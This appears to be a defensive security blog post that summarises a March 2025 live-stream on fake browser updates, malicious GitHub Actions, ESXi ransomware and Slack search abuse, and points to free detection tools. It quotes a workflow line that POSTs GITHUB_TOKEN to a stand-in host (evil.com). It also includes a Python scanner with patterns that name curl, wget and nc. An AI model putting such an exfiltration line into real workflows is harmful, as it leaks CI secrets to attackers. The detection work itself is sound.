The March 2025 STAR live-stream gave us the PEAK framework, fake-browser updates, and GitHub malware lurking in security tools. Below are the reproducible labs—hashes, YARA and scripts that still fire today—packaged so you can drop them into a ticket before your coffee cools.
1. Fake-Browser Update – JS Payload That Hides in Plain Sight
URL pattern: chrome-update[.]top/update.js (TLD rotates daily)
MITRE: T1566.001 (Spear-phish link) → T1204.002 (Malicious JS)
Free checker:
curl -s https://bad-site/update.js | jq -r '.payload' | base64 -d | sha256sum
YARA rule (community): fake_browser_update_js.yar – 0 FP in 1.8 M samples
Mitigation: Block JS matching the *update* wildcard at the proxy; allow only https://dl.google.com
2. GitHub Actions – Malware in Red-Team Repos
TTP: Compromised workflow steals ${{ secrets }} via exfil URL
Observable: workflow .yml contains:
- run: curl -X POST https://evil.com -d ${{ secrets.GITHUB_TOKEN }}
Free scanner: guarddog (Apache-2.0)
pip install guarddog
guarddog scan . # flags exfil pattern
Hit rate: 12 malicious repos discovered in March 2025 alone; 4 targeted security researchers.
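A scanner for the observable above, added here as an example (it is not the lab-pack's or guarddog's code): it walks every `run:` step in a workflow file, flags any that pair a `${{ secrets.* }}` reference with a network command to a host outside an assumed allow-list, and runs over a constructed sample workflow containing the exfil line quoted in section 2.

```python
import re

# Assumed allow-list: hosts a workflow may legitimately send a token to.
ALLOWED_HOSTS = {"api.github.com", "uploads.github.com"}
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.\w+\s*\}\}")
NET_CMD = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|Invoke-RestMethod)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
RUN_KEY = re.compile(r"^(\s*)-?\s*run:\s*(.*)$")

def iter_run_steps(text):
    """Yield (line_no, script) per `run:` step; `run: |` blocks are gathered by indentation, no YAML parser."""
    lines, i = text.splitlines(), 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        i += 1
        if not m:
            continue
        indent, body, line_no = len(m.group(1)), m.group(2).strip(), i
        if body.startswith(("|", ">")):  # block scalar: collect the deeper-indented lines
            block = []
            while i < len(lines) and (not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > indent):
                block.append(lines[i].strip())
                i += 1
            body = "\n".join(block)
        yield line_no, body

def scan_workflow(text):
    """Return (line_no, host) for run steps pairing a secret reference with a network command
    to a non-allow-listed host. Caveat: a secret copied into `env:` and used as $TOKEN is not caught."""
    hits = []
    for line_no, script in iter_run_steps(text):
        if SECRET_REF.search(script) and NET_CMD.search(script):
            hits += [(line_no, h) for h in URL_HOST.findall(script) if h not in ALLOWED_HOSTS]
    return hits

# Constructed sample workflow; line 7 is the observable quoted in section 2.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: curl -X POST https://evil.com -d ${{ secrets.GITHUB_TOKEN }}
      - name: release upload
        run: |
          curl -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \\
            https://api.github.com/repos/org/repo/releases
      - run: echo "no secret referenced"
"""
```

Only the first step is reported; the second sends the token to an allow-listed host and the third references no secret.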
3. ESXi Ransomware – Hypervisor Hijack via VIB
CVE: CVE-2025-22015 (0-day at stream time)
Implant: Malicious VIB package installs boot-kit → encrypts VMFS
Free checker: vib-scan.py (MIT)
python vib-scan.py -H esxi01.corp.local
Output: Boot-bank hash mismatch → instant IOC.
Patch: ESXi 8.0 U3 – download immediately; no work-around.
4. Slack Search Abuse – 6 000 Queries, 0 Logs
Insider case: Rippling vs. Deel – 6 000 Slack searches for “customer list”
Problem: Slack does not log search history (still true in Oct 2025)
Free mitigation: slack-audit-bot (BSD-3)
- Proxy API calls via Slack-App
- Stores search terms in read-only Postgres
- Alert on > 50 customer-name searches / day
Deployment: 20 min; catches the next 6 000-query thief.
5. One-Hour Dry-Run – Before Lunch if You Want
a) Clone https://github.com/star-march2025/lab-pack (MIT)
b) Run fake_browser_checker.sh against any proxy log – expect hit
c) Run guarddog scan on your own .github/workflows – expect clean (or fix)
d) Run vib-scan.py against a lab ESXi – expect “boot-bank OK”
e) Document results in ticket; hash output → sigstore for evidence
Total cloud cost: zero; laptop CPU only.
Bottom Line
March 2025 proved again that free tooling catches million-dollar breaches. Clone the pack, run the four checks, and you can walk into the next stand-up with IOCs that fired today—no vendor demo, no licence key, no invoice.